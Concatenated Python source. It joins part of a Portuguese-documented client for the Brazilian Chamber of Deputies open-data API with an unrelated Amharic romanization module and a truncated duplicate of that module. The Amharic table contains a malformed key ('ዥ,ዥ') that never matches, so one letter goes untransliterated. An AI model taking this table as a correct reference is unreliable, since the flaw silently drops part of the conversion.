Data de início de um intervalo de tempo, no formato 'AAAA-MM-DD'.
fim : str (default=None)
Data de término de um intervalo de tempo, no formato 'AAAA-MM-DD'.
pagina : int (default=1)
Número da página de resultados, a partir de 1, que se deseja
obter com a requisição, contendo o número de itens definido
pelo parâmetro `itens`. Se omitido, assume o valor 1.
itens : int (default=None)
Número máximo de itens na página que se deseja obter com esta
requisição.
asc : bool (default=True)
Se os registros são ordenados no sentido ascendente:
- True: De A a Z ou 0 a 9 (ascendente);
- False: De Z a A ou 9 a 0 (descendente).
ordenar_por : str (default='nome')
Qual dos elementos da representação deverá ser usado para aplicar
ordenação à lista.
index : bool (default=False)
Se True, define a coluna `id` como index do DataFrame.
Retorna
-------
pandas.core.frame.DataFrame
Lista de deputados.
--------------------------------------------------------------------------
'''
params = {}
if nome is not None:
params['nome'] = nome
if legislatura is not None:
params['idLegislatura'] = legislatura
if uf is not None:
params['siglaUf'] = parse.uf(uf)
if partido is not None:
params['siglaPartido'] = partido
if sexo is not None:
params['siglaSexo'] = sexo
if inicio is not None:
params['dataInicio'] = parse.data(inicio, 'camara')
if fim is not None:
params['dataFim'] = parse.data(fim, 'camara')
params['pagina'] = pagina
if itens is not None:
params['itens'] = itens
params['ordem'] = 'asc' if asc else 'desc'
params['ordenarPor'] = ordenar_por
dados = _get(path='deputados', params=params)
index_col = 'id' if index else None
return _df(dados, index_col)
def lista_eventos(
tipo_evento: int = None,
situacao: int = None,
tipo_orgao: int = None,
orgao: int = None,
inicio: str = None,
fim: str = None,
hora_inicio: str = None,
hora_fim: str = None,
pagina: int = 1,
itens: int = None,
asc: bool = True,
ordenar_por: str = 'dataHoraInicio',
index: bool = False
) -> _pd.DataFrame:
'''
Lista de eventos ocorridos ou previstos nos diversos órgãos da Câmara.
Retorna uma lista cujos elementos trazem informações básicas sobre eventos
dos órgãos legislativos da Câmara, previstos ou já ocorridos, em um certo
intervalo de tempo. Esse intervalo pode ser configurado pelos parâmetros
de data e hora listados abaixo. Se nenhum for passado, são listados
eventos dos cinco dias anteriores, dos cinco dias seguintes e do próprio
dia em que é feita a requisição.
Parâmetros
----------
tipo_evento : int (default=None)
Identificador numérico do tipo de evento que se deseja obter.
Os valores válidos podem ser obtidos pela função
`camara.referencias('tiposEvento')`.
situacao : int (default=None)
Identificador numéricos do tipo de situação de evento.
Valores válidos podem ser obtidos pela função
`camara.referencias('situacoesEvento')`.
tipo_orgao : int (default=None)
Identificador numérico do tipo de órgão realizador dos eventos que se
deseja obter. Os valores válidos podem ser obtidos pela função
`camara.referencias('tiposOrgao').
orgao : int (default=None)
Identificador numérico do órgão. Os identificadores podem ser obtidos
pela função `camara.lista_orgaos`.
inicio : str (default=None)
Data de início de um intervalo de tempo, no formato 'AAAA-MM-DD'.
fim : str (default=None)
Data de término de um intervalo de tempo, no formato 'AAAA-MM-DD'.
hora_inicio : str (default=None)
Hora inicial de um intervalo de tempo, no formato 'HH:MM', em horário
de Brasília.
hora_fim : str (default=None)
Hora final de um intervalo de tempo, no formato 'HH:MM', em horário
de Brasília.
pagina : int (default=1)
Número da página de resultados, a partir de 1, que se deseja
obter com a requisição, contendo o número de itens definido
pelo parâmetro `itens`. Se omitido, assume o valor 1.
itens : int (default=None)
Número máximo de itens na página que se deseja obter com esta
requisição.
asc : bool (default=True)
Se os registros são ordenados no sentido ascendente:
- True: De A a Z ou 0 a 9 (ascendente);
- False: De Z a A ou 9 a 0 (descendente).
ordenar_por : str (default='dataHoraInicio')
Qual dos elementos da representação deverá ser usado para aplicar
ordenação à lista.
index : bool (default=False)
Se True, define a coluna `id` como index do DataFrame.
Retorna
-------
pandas.core.frame.DataFrame
Lista de eventos ocorridos ou previstos nos diversos órgãos da
Câmara.
--------------------------------------------------------------------------
'''
params = {}
if tipo_evento is not None:
params['codTipoEvento'] = tipo_evento
if situacao is not None:
params['codSituacao'] = situacao
if tipo_orgao is not None:
params['codTipoOrgao'] = tipo_orgao
if orgao is not None:
params['idOrgao'] = orgao
if inicio is not None:
params['dataInicio'] = parse.data(inicio, 'camara')
if fim is not None:
params['dataFim'] = parse.data(fim, 'camara')
if hora_inicio is not None:
params['horaInicio'] = hora_inicio
if hora_fim is not None:
params['horaFim'] = hora_fim
params['pagina'] = pagina
if itens is not None:
params['itens'] = itens
params['ordem'] = 'asc' if asc else 'desc'
params['ordenarPor'] = ordenar_por
dados = _get(path='eventos', params=params)
index_col = 'id' if index else None
return _df(dados, index_col)
def lista_frentes(
legislatura: int = None,
pagina: int = 1,
index: bool = False
) -> _pd.DataFrame:
'''
Lista de frentes parlamentares de uma ou mais legislaturas.
Retorna uma lista de informações sobre uma frente parlamentar - um
agrupamento oficial de parlamentares em torno de um determinado tema ou
proposta. As frentes existem até o fim da legislatura em que foram
criadas, e podem ser recriadas a cada legislatura. Algumas delas são
compostas por deputados e senadores.
Um número de legislatura pode ser passado como parâmetro, mas se for
omitido são retornadas todas as frentes parlamentares criadas desde 2003.
Parâmetros
----------
legislatura : int (default=None)
Número da legislatura a qual os dados buscados devem corresponder.
pagina : int (default=1)
Número da página de resultados, a partir de 1, que se deseja
obter com a requisição, contendo o número de itens definido
pelo parâmetro `itens`. Se omitido, assume o valor 1.
index : bool (default=False)
Se True, define a coluna `id` como index do DataFrame.
Retorna
-------
pandas.core.frame.DataFrame
Lista de frentes parlamentares de uma ou mais legislaturas.
--------------------------------------------------------------------------
'''
params = {}
if legislatura is not None:
params['idLegislatura'] = legislatura
params['pagina'] = pagina
dados = _get(path='frentes', params=params)
index_col = 'id' if index else None
return _df(dados, index_col)
def lista_legislaturas(
data: str = None,
pagina: int = 1,
itens: int = None,
asc: bool = False,
ordenar_por: str = 'id',
index: bool = False
) -> _pd.DataFrame:
'''
Os períodos de mandatos e atividades parlamentares da Câmara.
Legislatura é o nome dado ao período de trabalhos parlamentares entre uma
eleição e outra. Esta função retorna uma lista em que cada item contém as
informações básicas sobre um desses períodos. Os números que identificam
as legislaturas são sequenciais, desde a primeira que ocorreu.
Parâmetros
----------
data : str (default=None)
Data no formato 'AAAA-MM-DD'. Se este parâmetro estiver presente, a
função retornará as informações básicas sobre a legislatura que estava
em curso na data informada.
pagina : int (default=1)
Número da página de resultados, a partir de 1, que se deseja
obter com a requisição, contendo o número de itens definido
pelo parâmetro `itens`. Se omitido, assume o valor 1.
itens : int (default=None)
Número máximo de itens na página que se deseja obter com esta
requisição.
asc : bool (default=False)
Se os registros são ordenados no sentido ascendente:
- True: De A a Z ou 0 a 9 (ascendente);
- False: De Z a A ou 9 a 0 (descendente).
ordenar_por : str (default='id')
Qual dos elementos da representação deverá ser usado para aplicar
ordenação à lista.
index : bool (default=False)
Se True, define a coluna `id` como index do DataFrame.
Retorna
-------
pandas.core.frame.DataFrame
Lista de legislaturas da Câmara.
--------------------------------------------------------------------------
'''
params = {}
if data is not None:
params['data'] = data
params['pagina'] = pagina
if itens is not None:
params['itens'] = itens
params['ordem'] = 'asc' if asc else 'desc'
params['ordenarPor'] = ordenar_por
dados = _get(path='legislaturas', params=params)
index_col = 'id' if index else None
return _df(dados, index_col)
def lista_orgaos(
sigla: str = None,
tipo: int = None,
inicio: str = None,
fim: str = None,
pagina: int = 1,
itens: int = None,
asc: bool = True,
ordenar_por: str = 'id',
index: bool = False
) -> _pd.DataFrame:
'''
Lista das comissões e outros órgãos legislativos da Câmara.
Retorna uma lista de informações básicas sobre os órgãos legislativos e
seus identificadores, tipos e descrições. É possível filtrar a lista por
identificadores, tipos de órgãos, sigla, situação do órgão ou período de
tempo em que os órgãos estiveram ativos, se aplicável.
Parâmetros
----------
sigla : str (default=None)
Sigla oficialmente usadas para designar o órgão da câmara.
tipo : int (default=None)
Código numérico do tipo de órgãos que se deseja buscar dados. Pode ser
obtido pela função `camara.referencias`.
inicio : str (default=None)
Data de início, no formato 'AAAA-MM-DD', de um intervalo de tempo no
qual os órgãos buscados devem ter estado em atividade.
fim : str (default=None)
Data de término, no formato 'AAAA-MM-DD', de um intervalo de tempo no
qual os órgãos buscados devem ter estado em atividade.
pagina : int (default=1)
Número da página de resultados, a partir de 1, que se deseja
obter com a requisição, contendo o número de itens definido
pelo parâmetro `itens`. Se omitido, assume o valor 1.
itens : int (default=None)
Número máximo de itens na página que se deseja obter com esta
requisição.
asc : bool (default=True)
Se os registros são ordenados no sentido ascendente:
- True: De A a Z ou 0 a 9 (ascendente);
- False: De Z a A ou 9 a 0 (descendente).
ordenar_por : str (default='id')
Qual dos elementos da representação deverá ser usado para aplicar
ordenação à lista.
index : bool (default=False)
Se True, define a coluna `id` como index do DataFrame.
Retorna
-------
pandas.core.frame.DataFrame
Lista das comissões e outros órgãos legislativos da Câmara.
--------------------------------------------------------------------------
'''
params = {}
if sigla is not None:
params['sigla'] = sigla
if tipo is not None:
params['codTipoOrgao'] = tipo
if inicio is not None:
params['dataInicio'] = parse.data(inicio, 'camara')
if fim is not None:
params['dataFim'] = parse.data(fim, 'camara')
params['pagina'] = pagina
if itens is not None:
params['itens'] = itens
params['ordem'] = 'asc' if asc else 'desc'
params['ordenarPor'] = ordenar_por
dados = _get(path='orgaos', params=params)
index_col = 'id' if index else None
return _df(dados, index_col)
def lista_partidos(
legislatura: int = None,
inicio: str = None,
fim: str = None,
pagina: int = 1,
itens: int = None,
asc: bool = True,
ordenar_por: str = 'sigla',
index: bool = False
) -> _pd.DataFrame:
'''
Os partidos políticos que têm ou já tiveram parlamentares em exercício na
Câmara.
Retorna uma lista de dados básicos sobre os partidos políticos que têm ou
já tiveram deputados na Câmara. Se não forem passados parâmetros, a função
retorna os partidos que têm deputados em exercício no momento da
requisição. É possível obter uma lista de partidos representados na Câmara
em um certo intervalo de datas ou de legislaturas.
Parâmetros
----------
legislatura : int (default=None)
Número da legislatura a qual os dados buscados devem corresponder.
inicio : str (default=None)
Data de início de um intervalo de tempo, no formato 'AAAA-MM-DD'.
fim : str (default=None)
Data de término de um intervalo de tempo, no formato 'AAAA-MM-DD'.
pagina : int (default=1)
Número da página de resultados, a partir de 1, que se deseja
obter com a requisição, contendo o número de itens definido
pelo parâmetro `itens`. Se omitido, assume o valor 1.
itens : int (default=None)
Número máximo de itens na página que se deseja obter com esta
requisição.
asc : bool (default=True)
Se os registros são ordenados no sentido ascendente:
- True: De A a Z ou 0 a 9 (ascendente);
- False: De Z a A ou 9 a 0 (descendente).
ordenar_por : str (default='sigla')
Qual dos elementos da representação deverá ser usado para aplicar
ordenação à lista.
index : bool (default=False)
Se True, define a coluna `id` como index do DataFrame.
Retorna
-------
pandas.core.frame.DataFrame
Lista de partidos políticos que têm ou já tiveram parlamentares em
exercício na Câmara.
--------------------------------------------------------------------------
'''
params = {}
if legislatura is not None:
params['idLegislatura'] = legislatura
if inicio is not None:
params['dataInicio'] = parse.data(inicio, 'camara')
if fim is not None:
params['dataFim'] = parse.data(fim, 'camara')
params['pagina'] = pagina
if itens is not None:
params['itens'] = itens
params['ordem'] = 'asc' if asc else 'desc'
params['ordenarPor'] = ordenar_por
dados = _get(path='partidos', params=params)
index_col = 'id' if index else None
return _df(dados, index_col)
def lista_proposicoes(
tipo: str = None,
numero: int = None,
ano: int = None,
autor_cod: int = None,
autor_nome: str = None,
partido_sigla: str = None,
partido_cod: int = None,
autor_uf: str = None,
keyword: str = None,
tramitacao_senado: bool = None,
apresentacao_inicio: str = None,
apresentacao_fim: str = None,
situacao: int = None,
tema: int = None,
inicio: str = None,
fim: str = None,
pagina: int = 1,
itens: int = None,
asc: bool = True,
ordenar_por: str = 'id',
index: bool = False
) -> _pd.DataFrame:
'''
Lista de proposições na Câmara.
Lista de informações básicas sobre projetos de lei, resoluções, medidas
provisórias, emendas, pareceres e todos os outros tipos de proposições na
Câmara. Por padrão, são retornadas todas as proposições que foram
apresentadas ou tiveram alguma mudança de situação nos últimos 30 dias.
Esse intervalo de tramitação pode ser configurado pelos parâmetros
`inicio` e `fim`.
Se for(em) passado(s) um ou mais dos parâmetros `id`, `ano`,
`apresentacao_inicio`, `apresentacao_fim`, `autor_cod`, `autor_nome`,
o intervalo de tramitação só será levado em consideração se os parâmetros
`inico` e/ou `fim` estiverem explicitamente configurados. Se não
estiverem, poderão ser listadas proposições que não tiveram tramitação
recente (e a resposta pode demorar bastante).
Parâmetros
----------
tipo : str (default=None)
Sigla do tipo das proposições que se deseja obter. A lista de tipos e
siglas existentes pode ser obtida pela função `camara.referencias`.
numero : int (default=None)
Número oficialmente atribuídos às proposições segundo o art. 137 do
Regimento Interno, como “PL 1234/2016”
ano : int (default=None)
Ano de apresentação das proposições que serão listadas no formato
'AAAA'.
autor_cod : int (default=None)
Código numérico identificador do deputado autor das proposições que
serão listadas.
autor_nome : str (default=None)
Nome ou parte do nome do(s) autor(es) das proposições que se deseja
obter. Deve estar entre aspas.
partido_sigla : str (default=None)
Sigla do partido a que pertençam os autores das proposições a serem
listadas.
partido_cod : int (default=None)
Identificador numérico do partido a que pertençam os autores das
proposições que serão listadas. Esses identificadores podem ser
obtidos pela função `camara.lista_partidos` e são mais precisos do
que as siglas, que podem ser usadas por partidos diferentes em épocas
diferentes.
autor_uf : str (default=None)
Sigla da unidade da federação (estados e Distrito Federal) pela qual
o(s) autor(es) das proposições selecionadas tenha(m) sido eleito(s).
keyword : str (default=None)
Palavra-chave sobre o tema a que a proposição se relaciona.
tramitacao_senado : bool (default=None)
Buscar proposições que já tenha tramitado no Senado.
inicio : str (default=None)
Data do início do intervalo de tempo em que tenha havido tramitação
das proposições a serem listadas, no formato 'AAAA-MM-DD'. Se omitido,
é assumido como a data de 30 dias anteriores à proposição.
fim : str (default=None)
Data do fim do intervalo de tempo em que tenha havido tramitação das
proposições a serem listadas. Se omitido, é considerado ser o dia em
que é feita a requisição.
apresentacao_inicio : str (default=None)
Data do início do intervalo de tempo em que tenham sido apresentadas
as proposições a serem listadas, no formato 'AAAA-MM-DD'.
apresentacao_fim : str (default=None)
Data do fim do intervalo de tempo em que tenham sido apresentadas as
proposições a serem listadas.
situacao : int (default=None)
Código numérico do tipo de situação em que se encontram as proposições
que serão listadas. As situações possíveis podem ser obtidas pela
função `camara.referencias`. Atenção: este parâmetro pode apresentar
resultados inesperados, por problemas com o registro dos dados.
tema : int (default=None)
Código numérico das áreas temáticas das proposições que serão
listadas. Os temas possíveis podem ser obtidos pela função
`camara.referencias`.
pagina : int (default=1)
Número da página de resultados, a partir de 1, que se deseja
obter com a requisição, contendo o número de itens definido
pelo parâmetro `itens`. Se omitido, assume o valor 1.
itens : int (default=None)
Número máximo de itens na página que se deseja obter com esta
requisição.
asc : bool (default=True)
Se os registros são ordenados no sentido ascendente:
- True: De A a Z ou 0 a 9 (ascendente);
- False: De Z a A ou 9 a 0 (descendente).
ordenar_por : str (default='id')
Qual dos elementos da representação deverá ser usado para aplicar
ordenação à lista.
index : bool (default=False)
Se True, define a coluna `id` como index do DataFrame.
Retorna
-------
pandas.core.frame.DataFrame
Lista de proposições na Câmara.
--------------------------------------------------------------------------
'''
params = {}
if tipo is not None:
params['siglaTipo'] = tipo
if numero is not None:
params['numero'] = numero
if ano is not None:
params['ano'] = ano
if autor_cod is not None:
params['idDeputadoAutor'] = autor_cod
if autor_nome is not None:
params['autor'] = autor_nome
if partido_sigla is not None:
params['siglaPartidoAutor'] = partido_sigla
if partido_cod is not None:
params['idPartidoAutor'] = partido_cod
if autor_uf is not None:
params['siglaUfAutor'] = parse.uf(autor_uf)
if keyword is not None:
params['keywords'] = keyword
if tramitacao_senado is not None:
params['tramitacaoSenado'] = 'true' if tramitacao_senado else 'false'
if apresentacao_inicio is not None:
params['dataApresentacaoInicio'] = apresentacao_inicio
if apresentacao_fim is not None:
params['dataApresentacaoFim'] = apresentacao_fim
if situacao is not None:
params['codSituacao'] = situacao
if tema is not None:
params['codTema'] = tema
if inicio is not None:
params['dataInicio'] = parse.data(inicio, 'camara')
if fim is not None:
params['dataFim'] = parse.data(fim, 'camara')
params['pagina'] = pagina
if itens is not None:
params['itens'] = itens
params['ordem'] = 'asc' if asc else 'desc'
params['ordenarPor'] = ordenar_por
dados = _get(path='proposicoes', params=params)
index_col = 'id' if index else None
return _df(dados, index_col)
def lista_votacoes(
proposicao: int = None,
evento: int = None,
orgao: int = None,
inicio: str = None,
fim: str = None,
pagina: int = 1,
itens: int = None,
asc: bool = False,
ordenar_por: str = 'dataHoraRegistro',
index: bool = False
) -> _pd.DataFrame:
'''
Lista de votações na Câmara.
Retorna uma lista de informações básicas sobre as votações ocorridas em
eventos dos diversos órgãos da Câmara. Se não forem passados parâmetros
que delimitem o intervalo de tempo da pesquisa, são retornados dados sobre
todas as votações ocorridas nos últimos 30 dias, em eventos de todos os
órgãos.
Os parâmetros de data permitem estender o período, mas por enquanto é
necessário que as duas datas sejam de um mesmo ano. Quando apenas uma
delas está presente, são retornadas somente as votações ocorridas no mesmo
ano, antes de `fim` ou após `inicio`.
Parâmetros
----------
proposicao : int (default=None)
Código numérico da proposição, que podem ser obtidos pela função
`camara.lista_proposições`. Se presente, listará as votações que
tiveram a proposição como objeto de votação ou que afetaram as
proposições listadas.
evento : int (default=None)
Código numérico do evento realizado na Câmara, no qual tenham sido
realizadas as votações a serem listadas. Os códigos podem ser obtidos
pela função `camara.lista_eventos`. Somente os eventos deliberativos
podem ter votações. Os eventos podem ter ocorrido fora do intervalo de
tempo padrão ou definido por `inicio` e/ou `fim`.
orgao : int (default=None)
Código numérico do órgão da Câmara. Se presente, serão retornadas
somente votações do órgão enumerado. Os códigos existentes podem ser
obtidos pela função `camara.lista_orgaos`.
inicio : str (default=None)
Data em formato 'AAAA-MM-DD' para início do intervalo de tempo no qual
tenham sido realizadas as votações a serem listadas. Se usado sozinho,
esse parâmetro faz com que sejam retornadas votações ocorridas dessa
data até o fim do mesmo ano. Se usado com `fim`, as duas datas devem
ser de um mesmo ano.
fim : str (default=None)
Data em formato 'AAAA-MM-DD' que define o fim do intervalo de tempo no
qual tenham sido realizadas as votações a serem listadas. Se usado
sozinho, esse parâmetro faz com que sejam retornadas todas as votações
ocorridas desde 1º de janeiro do mesmo ano até esta data. Se usado com
`inicio`, é preciso que as duas datas sejam de um mesmo ano.
pagina : int (default=1)
Número da página de resultados, a partir de 1, que se deseja
obter com a requisição, contendo o número de itens definido
pelo parâmetro `itens`. Se omitido, assume o valor 1.
itens : int (default=None)
Número máximo de itens na página que se deseja obter com esta
requisição.
asc : bool (default=False)
Se os registros são ordenados no sentido ascendente:
- True: De A a Z ou 0 a 9 (ascendente);
- False: De Z a A ou 9 a 0 (descendente).
ordenar_por : str (default='dataHoraRegistro')
Qual dos elementos da representação deverá ser usado para aplicar
ordenação à lista.
index : bool (default=False)
Se True, define a coluna `id` como index do DataFrame.
Retorna
-------
pandas.core.frame.DataFrame
Lista de votações na Câmara.
--------------------------------------------------------------------------
'''
params = {}
if proposicao is not None:
params['idProposicao'] = proposicao
if evento is not None:
params['idEvento'] = evento
if orgao is not None:
params['idOrgao'] = orgao
if inicio is not None:
params['dataInicio'] = parse.data(inicio, 'camara')
if fim is not None:
params['dataFim'] = parse.data(fim, 'camara')
params['pagina'] = pagina
if itens is not None:
params['itens'] = itens
params['ordem'] = 'asc' if asc else 'desc'
params['ordenarPor'] = ordenar_por
dados = _get(path='votacoes', params=params)
index_col = 'id' if index else None
return _df(dados, index_col)
def referencias(
lista: str,
index: bool = False
) -> _pd.DataFrame:
'''
Listas de valores válidos para as funções deste módulo.
Parâmetros
----------
lista : str
Referências que serão listadas. Deve ser uma destas opções:
- 'autores'
- 'temas'
- 'eventos'
- 'orgaos'
- 'proposicoes'
- 'tramitacoes'
- 'ufs'
- 'situacoes_deputados'
- 'situacoes_eventos'
- 'situacoes_orgaos'
- 'situacoes_proposicoes'
index : bool (default=False)
Se True, define a coluna `cod` como index do DataFrame.
Retorna
-------
pandas.core.frame.DataFrame
Lista das referências válidas.
'''
referencia = {
'autores': 'proposicoes/codTipoAutor',
'temas': 'proposicoes/codTema',
'eventos': 'tiposEvento',
'orgaos': 'tiposOrgao',
'proposicoes': 'tiposProposicao',
'tramitacoes': 'tiposTramitacao',
'ufs': 'uf',
'situacoes_deputados': 'situacoesDeputado',
'situacoes_eventos': 'situacoesEvento',
'situacoes_orgaos': 'situacoesOrgao',
'situacoes_proposicoes': 'situacoesProposicao'
}
if lista in referencia.keys():
data = _get(f'referencias/{referencia[lista]}')
else:
raise TypeError('Referência inválida. Insira um dos seguintes valores para `lista`: ' \
+ ', '.join(list(referencia.keys())))
df = _pd.DataFrame(data['dados'])
if index:
df.set_index('cod', inplace=True)
return df |
# Reference: https://www.loc.gov/catdir/cpso/romanization/amharic.pdf
_transliteration = {
# Syllables
'ሀ': ['ha'],
'ሁ': ['hu'],
'ሂ': ['hi'],
'ሃ': ['hā'],
'ሄ': ['hé'],
'ህ': ['he', 'h'],
'ሆ': ['ho'],
'ለ': ['la'],
'ሉ': ['lu'],
'ሊ': ['li'],
'ላ': ['lā'],
'ሌ': ['lé'],
'ል': ['le', 'l'],
'ሎ': ['lo'],
'ሐ': ['ḥa'],
'ሑ': ['ḥu'],
'ሒ': ['ḥi'],
'ሓ': ['ḥā'],
'ሔ': ['ḥé'],
'ሕ': ['ḥe', 'ḥ'],
'ሖ': ['ḥo'],
'መ': ['ma'],
'ሙ': ['mu'],
'ሚ': ['mi'],
'ማ': ['mā'],
'ሜ': ['mé'],
'ም': ['me', 'm'],
'ሞ': ['mo'],
'ሠ': ['śa'],
'ሡ': ['śu'],
'ሢ': ['śi'],
'ሣ': ['śā'],
'ሤ': ['śé'],
'ሥ': ['śe', 'ś'],
'ሦ': ['śo'],
'ረ': ['ra'],
'ሩ': ['ru'],
'ሪ': ['ri'],
'ራ': ['rā'],
'ሬ': ['ré'],
'ር': ['re', 'r'],
'ሮ': ['ro'],
'ሰ': ['sa'],
'ሱ': ['su'],
'ሲ': ['si'],
'ሳ': ['sā'],
'ሴ': ['sé'],
'ስ': ['se', 's'],
'ሶ': ['so'],
'ሸ': ['ša'],
'ሹ': ['šu'],
'ሺ': ['ši'],
'ሻ': ['šā'],
'ሼ': ['šé'],
'ሽ': ['še', 'š'],
'ሾ': ['šo'],
'ቀ': ['qa'],
'ቁ': ['qu'],
'ቂ': ['qi'],
'ቃ': ['qā'],
'ቄ': ['qé'],
'ቅ': ['qe', 'q'],
'ቆ': ['qo'],
'በ': ['ba'],
'ቡ': ['bu'],
'ቢ': ['bi'],
'ባ': ['bā'],
'ቤ': ['bé'],
'ብ': ['be', 'b'],
'ቦ': ['bo'],
'ተ': ['ta'],
'ቱ': ['tu'],
'ቲ': ['ti'],
'ታ': ['tā'],
'ቴ': ['té'],
'ት': ['te', 't'],
'ቶ': ['to'],
'ቸ': ['ča'],
'ቹ': ['ču'],
'ቺ': ['či'],
'ቻ': ['čā'],
'ቼ': ['čé'],
'ች': ['če', 'č'],
'ቾ': ['čo'],
'ኀ': ['ha'],
'ኁ': ['hu'],
'ኂ': ['hi'],
'ኃ': ['hā'],
'ኄ': ['hé'],
'ኅ': ['he', 'h'],
'ኆ': ['ho'],
'ነ': ['na'],
'ኑ': ['nu'],
'ኒ': ['ni'],
'ና': ['nā'],
'ኔ': ['né'],
'ን': ['ne', 'n'],
'ኖ': ['no'],
'ኘ': ['ña'],
'ኙ': ['ñu'],
'ኚ': ['ñi'],
'ኛ': ['ñā'],
'ኜ': ['ñé'],
'ኝ': ['ñe', 'ñ'],
'ኞ': ['ño'],
'አ': ['ʼa'],
'ኡ': ['ʼu'],
'ኢ': ['ʼi'],
'ኣ': ['ʼā'],
'ኤ': ['ʼé'],
'እ': ['ʼe'],
'ኦ': ['ʼo'],
'ከ': ['ka'],
'ኩ': ['ku'],
'ኪ': ['ki'],
'ካ': ['kā'],
'ኬ': ['ké'],
'ክ': ['ke', 'k'],
'ኮ': ['ko'],
'ኸ': ['xa'],
'ኹ': ['xu'],
'ኺ': ['xi'],
'ኻ': ['xā'],
'ኼ': ['xé'],
'ኽ': ['xe', 'x'],
'ኾ': ['xo'],
'ወ': ['wa'],
'ዉ': ['wu'],
'ዊ': ['wi'],
'ዋ': ['wā'],
'ዌ': ['wé'],
'ው': ['we', 'w'],
'ዎ': ['wo'],
'ዐ': ['ʻa'],
'ዑ': ['ʻu'],
'ዒ': ['ʻi'],
'ዓ': ['ʻā'],
'ዔ': ['ʻé'],
'ዕ': ['ʻe'],
'ዖ': ['ʻo'],
'ዘ': ['za'],
'ዙ': ['zu'],
'ዚ': ['zi'],
'ዛ': ['zā'],
'ዜ': ['zé'],
'ዝ': ['ze', 'z'],
'ዞ': ['zo'],
'ዠ': ['ža'],
'ዡ': ['žu'],
'ዢ': ['ži'],
'ዣ': ['žā'],
'ዤ': ['žé'],
'ዥ,ዥ': ['že', 'ž'],
'ዦ': ['žo'],
'የ': ['ya'],
'ዩ': ['yu'],
'ዪ': ['yi'],
'ያ': ['yā'],
'ዬ': ['yé'],
'ይ': ['ye', 'y'],
'ዮ': ['yo'],
'ደ': ['da'],
'ዱ': ['du'],
'ዲ': ['di'],
'ዳ': ['dā'],
'ዴ': ['dé'],
'ድ': ['de', 'd'],
'ዶ': ['do'],
'ጀ': ['ǧa'],
'ጁ': ['ǧu'],
'ጂ': ['ǧi'],
'ጃ': ['ǧā'],
'ጄ': ['ǧé'],
'ጅ': ['ǧe', 'ǧ'],
'ጆ': ['ǧo'],
'ገ': ['ga'],
'ጉ': ['gu'],
'ጊ': ['gi'],
'ጋ': ['gā'],
'ጌ': ['gé'],
'ግ': ['ge', 'g'],
'ጎ': ['go'],
'ጠ': ['ṭa'],
'ጡ': ['ṭu'],
'ጢ': ['ṭi'],
'ጣ': ['ṭā'],
'ጤ': ['ṭé'],
'ጥ': ['ṭe', 'ṭ'],
'ጦ': ['ṭo'],
'ጨ': ['ċa'],
'ጩ': ['ċu'],
'ጪ': ['ċi'],
'ጫ': ['ċā'],
'ጬ': ['ċé'],
'ጭ': ['ċe', 'ċ'],
'ጮ': ['ċo'],
'ጰ': ['p̣a'],
'ጱ': ['p̣u'],
'ጲ': ['p̣i'],
'ጳ': ['p̣ā'],
'ጴ': ['p̣é'],
'ጵ': ['p̣e', 'p̣'],
'ጶ': ['p̣o'],
'ጸ': ['ṣa'],
'ጹ': ['ṣu'],
'ጺ': ['ṣi'],
'ጻ': ['ṣā'],
'ጼ': ['ṣé'],
'ጽ': ['ṣe', 'ṣ'],
'ጾ': ['ṣo'],
'ፀ': ['ṡa'],
'ፁ': ['ṡu'],
'ፂ': ['ṡi'],
'ፃ': ['ṡā'],
'ፄ': ['ṡé'],
'ፅ': ['ṡe', 'ṡ'],
'ፆ': ['ṡo'],
'ፈ': ['fa'],
'ፉ': ['fu'],
'ፊ': ['fi'],
'ፋ': ['fā'],
'ፌ': ['fé'],
'ፍ': ['fe', 'f'],
'ፎ': ['fo'],
'ፐ': ['pa'],
'ፑ': ['pu'],
'ፒ': ['pi'],
'ፓ': ['pā'],
'ፔ': ['pé'],
'ፕ': ['pe', 'p'],
'ፖ': ['po'],
'ቨ': ['va'],
'ቩ': ['vu'],
'ቪ': ['vi'],
'ቫ': ['vā'],
'ቬ': ['vé'],
'ቭ': ['ve', 'v'],
'ቮ': ['vo'],
# Combinations with w
'ቈ': ['qwa'],
'ቊ': ['qwi'],
'ቋ': ['qwā'],
'ቌ': ['qwé'],
'ቍ': ['qwe'],
'ኈ': ['hwa'],
'ኊ': ['hwi'],
'ኋ': ['hwā'],
'ኌ': ['hwé'],
'ኍ': ['hwe'],
'ኰ': ['kwa'],
'ኲ': ['kwi'],
'ኳ': ['kwā'],
'ኴ': ['kwé'],
'ኵ': ['kwe'],
'ጐ': ['gwa'],
'ጒ': ['gwi'],
'ጓ': ['gwā'],
'ጔ': ['gwé'],
'ጕ': ['gwe'],
# Combinations with wa
'ሏ': ['lwa'],
'ቧ': ['bwa'],
'ዟ': ['zwa'],
'ጧ': ['ṭwā'],
'ሟ': ['mwa'],
'ቷ': ['twa'],
'ዧ': ['žwa'],
'ጯ': ['ċwā'],
'ሯ': ['rwa'],
'ቿ': ['čwa'],
'ጿ': ['ṣwā'],
'ሷ': ['swa'],
'ኗ': ['nwa'],
'ዷ': ['dwa'],
'ፏ': ['fwā'],
'ሿ': ['šwa'],
'ኟ': ['ñwa'],
'ጇ': ['ǧwa'],
# Combinations with ya
'ፘ':['rya'],
'ፙ':['mya'],
'ፚ':['fya'],
# Special initial
'ኧ': ['ă']
}
def romanize(text):
output = ''
for char in text:
try:
output += _transliteration[char][-1]
except KeyError:
output += char
return output
if __name__ == '__main__':
print(f"{romanize("ሰላም እንደምን አለህ?").capitalize()}")
| # Reference: https://www.loc.gov/catdir/cpso/romanization/amharic.pdf
_transliteration = {
# Syllables
'ሀ': ['ha'],
'ሁ': ['hu'],
'ሂ': ['hi'],
'ሃ': ['hā'],
'ሄ': ['hé'],
'ህ': ['he', 'h'],
'ሆ': ['ho'],
'ለ': ['la'],
'ሉ': ['lu'],
'ሊ': ['li'],
'ላ': ['lā'],
'ሌ': ['lé'],
'ል': ['le', 'l'],
'ሎ': ['lo'],
'ሐ': ['ḥa'],
'ሑ': ['ḥu'],
'ሒ': ['ḥi'],
'ሓ': ['ḥā'],
'ሔ': ['ḥé'],
'ሕ': ['ḥe', 'ḥ'],
'ሖ': ['ḥo'],
'መ': ['ma'],
'ሙ': ['mu'],
'ሚ': ['mi'],
'ማ': ['mā'],
'ሜ': ['mé'],
'ም': ['me', 'm'],
'ሞ': ['mo'],
'ሠ': ['śa'],
'ሡ': ['śu'],
'ሢ': ['śi'],
'ሣ': ['śā'],
'ሤ': ['śé'],
'ሥ': ['śe', 'ś'],
'ሦ': ['śo'],
'ረ': ['ra'],
'ሩ': ['ru'],
'ሪ': ['ri'],
'ራ': ['rā'],
